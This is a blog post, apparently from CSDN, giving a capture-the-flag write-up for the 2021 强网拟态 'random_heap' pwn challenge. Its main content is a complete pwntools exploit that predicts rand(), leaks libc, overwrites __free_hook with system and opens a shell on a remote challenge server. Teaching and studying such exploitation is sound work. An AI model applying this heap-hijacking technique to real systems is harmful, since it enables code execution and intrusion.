2021强网拟态 pwn random_heap

最新推荐文章于 2024-09-01 22:13:42 发布
原创 最新推荐文章于 2024-09-01 22:13:42 发布 · 301 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

在这里插入图片描述
题目的难度在于他chunk分配的地址是随机的。
如何能破掉这种随机。
我采取的方法是硬爆破,直到爆破到我想要的那种形式,我们加以利用。
爆破的过程中可以稍加采取限制,减少爆破时间。

# -*- coding: utf-8 -*-
from pwn import*
from ctypes import *

#context.log_level='debug'
context.arch='amd64'
context.os = "linux"
#context.terminal = ["tmux", "splitw", "-h"]

local = 0
if local:
    r = process('./random_heap')
else:
    r = remote("124.71.140.198", 49153)
    

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()


#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./libc-2.27.so")
libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

def debug():
    gdb.attach(r)
    pause()

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def add(index, size):
    sla("Your choice: ", "1")
    sla("Index: ", str(index))
    sla("Size: ", str(size))


def edit(index, content):
    sla("Your choice: ", "2")
    sla("Index: ", str(index))
    sla("Content: ", content)


def show(index):
    sla("Your choice: ", "3")
    sla("Index: ", str(index))


def delete(index):
    sla("Your choice: ", "4")
    sla("Index: ", str(index))

v0 = libcc.time(0)
libcc.srand(v0)

for i in range(64):
    add(i, 0x80)
    a = libcc.rand()

for i in range(64):
    delete(i)

s = ""

for i in range(64):
    show(i)
    s = ru("\n")
    if len(s) > 15 and s[14] == '\x7f':
        break

malloc_hook = (u64(s[9:15].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
lg("libc_base", libc_base)

for i in range(64):
    edit(i, p64(free_hook))

ss = ['a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a']

for i in range(63):
    add(i, 0x80)
    edit(i, '/bin/sh\x00')
    a = libcc.rand() & 0xf
    print int(a)
    if ss[int(a)] == 'b':
        edit(i, p64(system_addr))
        break
    ss[int(a)] = "b"

print ss
delete(0)

sl("cat flag")
    
r.interactive()
[Writeup]2021拟态 Give_me_your_0day
feng的博客
10-29 731
前言 当时没能做出来,当时想到了mysql恶意服务端读取文件,但是没能读成功,不知道是为什么。今天看到Firebasky师傅的github更新了writeup,也是学习了一波。 解法1 当时没有拿Seay去扫,单纯的自己肉眼审install.php。自己审这种前后端没有分离的代码,只会去看不涉及到前端的PHP代码,就出了问题,遗漏了漏洞。 拿Seay扫一下第一条就能扫到,install.php608行的这个文件包含漏洞: <?php requir
2021拟态复现
qq_46441427的博客
10-30 779
sonic checksec一下 发现开了PIE和NX还有relro,这里比赛的时候本来想打ret2csu的。。好像是这个名字。。忘了 程序打印出了main的地址,开PIE后三位不变,所以打印出main地址后直接取除了后三位的其他位,在ida找后三位地址加上就行,然后就可以栈溢出getshell from pwn import * #r=remote('123.60.63.90',6890) r = process('./sonic') context(arch='amd64', os='linux')
2021拟态misc部分wp
hezhing
11-02 503
2021拟态misc部分wp Bar 打开是一个gif,看着有点像莫斯,先用gif分离工具分离一下,得到334张图片 发现有三种颜色,黑白灰。猜测黑为"-",白为".",灰色为空格,生成莫斯密码: from PIL import Image import os for i in os.listdir(): if(i.split(".")[1] == "png"): p = Image.open(
2022拟态pwn-bfbf
z1r0的博客
11-16 610
这题笔者感觉就是绕过这个read的限制,之前遇见过类似的,可以用close(0)然后read读flag的时候rdi可以置为0,就可以绕过line 0005的限制了,赛后看其他师傅的wp还看到了用sendfile的方法。控制好这里的数字然后泄露出libc,再打返回地址到rop链即可。漏洞点的话就是index这个下标没有限制从而导致的oob。
PWN random [pwnable.kr]CTF writeup题解系列6
重新启程
01-01 873
目录 0x01 题目 0x02 解题思路 0x03 题解 0x01 题目 0x02 解题思路 题目比较简单,直接贴出过程 root@mypwn:/ctf/work/pwnable.kr# ssh random@pwnable.kr -p2222 random@pwnable.kr's password: ____ __ __ ____ ____ ...
第四届“拟态防御国际精英挑战赛_wp(下)
蚁景网安学院
10-29 1518
Crypto签到flag{GaqY7KtEtrVIX1Q5oP5iEBRCYXEAy8rT}Web1、zerocalc读到readFile('./src/index.js') = cons...
pwn入门-buu第五页题解(32道)(更新完毕,下一章见)
2303_79366759的博客
09-01 902
然后就是修改IO_stdout结构体里面的内容了,把_IO_write_base适当修改即可打印出IO_stdout附近的内容,具体改成什么取决于你的机器,不过大概率需要爆破一位,所以只有1/16的成功率,不过本地的成功率却高得出奇,可能是本地没有那么随机化吧。这里我申请了一个idx为16的堆块,那么堆块地址的最低位是为0的,虽然我们不能edit(16),但是在这里edit(0)既然可以编辑我申请的idx为16的堆块,那么这样就可以轻松造成堆溢出,从而修改已经free掉的堆块的fd指针来实现任意地址改了。
buuctf中的一些pwn题总结(不断更新)
PLpa的博客
08-19 4938
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn题,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解题思路 由于此题存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
BUUCTF pwn wp 121 - 125
fa1c4的blog
03-24 843
qctf2018_stack2 杯2019 拟态 STKOF zctf_2016_note3 bcloud_bctf_2016 hgame2018_flag_server hgame2018_flag_server$ file flag_server;checksec flag_server flag_server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
pwn的学习6 random
飞花的世界
12-31 547
这道题 #include &lt;stdio.h&gt; int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &amp;key); if( (key ...
pwn篇:随机数种子
weixin_44644249的博客
02-02 1260
攻防世界pwn进阶:dice_game 程序分析: 64位elf可执行文件、libc.so.6库文件 保护:除了Canary,其他保护全开 IDA分析程序逻辑 创建一个随机数种子,为当前时间 首先输入名字,长度为55的数组。程序对输入做了处理,当大于49长度时,将最后一个赋值为“0x00”,也就是对字符串长度进行了限制,这个函数没什么问题。 打印输入的字符串,这里也没什么问题。 调用了srand函数,seed是输入名字时字符串第0x41个元素,也就是该值可控。 SUB_A20函数对随机数进行了处理,
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1943
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
乱七八糟的pwn入门(七)——6.random
Z_Pathon的博客
09-06 646
审题 首先看题目: 可以看出,这是一道关于随机数的题目。看一下代码: #include <stdio.h> int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &key); if( (key ...
PWN:关于对Random函数的研究
m0_53932372的博客
03-01 825
random在CTF中经常出现,所以今天我想深度的研究这个函数。 srand()函数 原型:void srand(unsigned seed); 给rand()函数设置种子。 rand()函数 原型 在执行前,会先查看是否使用了srand()函数。 1.使用了srand(seed),就按照这个东西来产生随机数。 2.没有使用srand(seed),就默认使用了srand(1)来产生随机数。 time函数 原型:time_t time(time_t *timer) timer=NULL时得到当前日历时间(从1
pwn random随机数保姆级教程★
YX-hueimie
11-29 3430
本文章为glibc中random随机数的详解,讲解了随机数的诞生。学完本文章,你将会有以下收获:加深对random随机数的理解,略微提升计算机组成原理的水平。
2022拟态pwn-webheap
z1r0的博客
11-21 1041
index代表的是上图中的index,p8(0x82)代表后面要接一个p32的数据(这些都可以在上面的encoding_byte中找到是什么意思)p8(0xbd)代表的是字符串,接着后面会接content的长度和content,遵循上面的反序列化格式即可。上面给出10, “foo”,下面的compose的第一个就是0xb9,第二个是有几个参数,第三个是第一个参数的值,第四个是string类型,第五个是对应的foo的长度,第6个是foo这个字符串。所以笔者就配合前期逆向,顺着这上面的初步写了一个序列化实例。
拟态REV-(fastjsoN)wp
Henlenl的博客
10-26 419
fastjsoN 依照这个链接可以知道 跟之前长安杯和看雪KCTF题目差不多 先用脚本恢复一下符号 0x02, 0x3A, 0x10, 0x6C, 0x6F, 0x6E, 0x67, 0x32, 0x73, 0x74, 0x72, 0x10, 0x73, 0x74, 0x72, 0x32, 0x6C, 0x6F, 0x6E, 0x67, 0x10, 0x73, 0x64, 0x66, 0x73, 0x66, 0x73, 0x64, 0x66, 0x0E, 0x73, 0x74, 0x72, 0x32,
2022拟态pwn-store
z1r0的博客
11-22 916
首先是这个沙箱,64位只有r和w,一开始看的时候很纳闷多了32位的限制,64位还没有o,查了一下才知道这样的seccomp-tools是以64位的检查来检查的,所以上面显示的32位系统调用就是64位的系统调用,所以看一下上面在32位显示的这些实际上是多少。所以思路比较清楚,利用house of apple2控制程序流程,mprotect控制rwx权限,布置shellcode,需要注意的是远程flag文件名需要getdents找一下,找完了之后利用orw即可。chmod对应是0x5a,对应32位是mmap。
2021-07-22ctf2021杯wp赌徒反序列化
qq_45290991的博客
07-22 856
文章目录 源代码:分析__invoke__get_tostring EXP调用流程:总结 源代码: <meta charset="utf-8"> <?php //hint is in hint.php error_repo...
pwn 2024
最新发布
01-26
### 关于2024年PWN比赛 #### 比赛概述 “杯”全国网络安全挑战赛是由中国络空间安全协会主办的全国性竞赛,旨在选拔和培养网络安全人才[^1]。该赛事涵盖了多种类型的网络安全竞赛项目,其中包括PWN比赛。 #### PWN比赛简介 PWN比赛是一种特定类型的CTF(Capture The Flag)竞赛模式之一。CTF起源于1996年的DEFCON全球黑客大会,已成为全球范围内流行的网络安全竞赛形式[^2]。PWN比赛主要侧重于漏洞挖掘与利用,参赛队伍需展示如何突破给定的目标系统或应用的安全防护机制。 #### 2024年PWN比赛详情 目前官方尚未公布具体的2024年PWN比赛细节。通常情况下,“杯”的活动安排会在官方站上提前发布通知,并提供详细的日程表以及报名指南。建议密切关注主办方发布的最新消息以获取最准确的比赛时间和规则说明。 #### 如何准备参加PWN比赛 为了更好地参与到此类比赛中去,选手应当掌握一系列必要的技能和技术: - **逆向工程**:理解二进制文件结构及其工作原理。 - **漏洞分析**:识别软件中的潜在缺陷并评估其可利用程度。 - **编程能力**:熟练运用C/C++、Python等语言编写高效可靠的工具脚本。 - **操作系统内核知识**:熟悉Linux/Windows系统的内部运作流程。 - **Web安全基础**:了解常见的Web应用程序攻击面如SQL注入、XSS跨站脚本等。 对于有兴趣加入这项高水平对抗性演练的朋友来说,平时多加练习是非常重要的。可以通过在线平台上的模拟环境来积累实战经验,比如pwnable.kr 或者 HackTheBox。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值